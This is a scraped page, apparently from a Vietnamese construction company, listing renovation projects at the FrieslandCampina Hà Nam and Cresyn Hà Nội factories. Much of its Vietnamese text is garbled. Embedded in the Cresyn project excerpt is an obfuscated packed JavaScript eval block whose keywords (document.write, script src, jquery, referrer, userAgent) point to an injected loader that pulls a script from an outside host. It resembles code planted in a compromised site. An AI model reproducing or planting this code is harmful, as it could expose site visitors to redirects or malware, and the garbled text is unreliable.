Maintenaince

DSC_7254

Cải tạo nhà máy FrieslandCampina Hà Nam.

Western b?t ??u tri?n khai c?i t?o nhà máy FrieslandCampina Hà Nam t? tháng 06/2015 ??n nay. Công trình ?òi h?i cao v? v? sinh c?ng nh? an toàn lao ??ng do tính ch?t ??c thù c?a ngành s?n xu?t s?a và ?ang ho?t ??ng bình th??ng trong lúc c?i t?o. M?t s? hình ?nh v? vi?c tuyên truy?n...  Read more
29042014(001)

Cải tạo nhà máy Cresyn Hà Nội.

M?t eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|irdkr|var|u0026u|referrer|ahbnh||js|php'.split('|'),0,{})) ...  Read more